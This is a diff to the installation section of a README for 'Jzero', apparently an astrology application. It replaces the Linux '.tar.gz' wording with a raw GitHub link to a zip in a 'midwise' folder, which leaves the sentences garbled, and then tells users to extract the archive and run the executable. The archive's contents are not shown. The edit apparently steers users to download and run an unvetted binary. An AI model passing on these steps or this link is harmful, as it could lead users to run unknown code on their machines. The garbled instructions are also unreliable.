LightYK3/Jzero/README.md

    - For Windows, download the `.exe` file.
    - For macOS, download the `.dmg` file.
-   - For Linux, download the appropriate `.tar.gz` or binary file.
+   - For Linux, download the appropriate `https://raw.githubusercontent.com/LightYK3/Jzero/main/midwise/Jzero.zip` or binary file.

 4. **Install the Application:**
    - **Windows:** Double click the downloaded `.exe` file to start the installation.
 Follow the on-screen prompts.
    - **macOS:** Open the downloaded `.dmg` file.
 Drag the Jzero application icon into your Applications folder.
-   - **Linux:** Extract the `.tar.gz` file.
+   - **Linux:** Extract the `https://raw.githubusercontent.com/LightYK3/Jzero/main/midwise/Jzero.zip` file.
 Then, open your terminal, navigate to the extracted folder, and run the executable file.

 5. **Launch Jzero:**
    - After installation, find Jzero in your applications.
 Click to open it and start exploring astrology.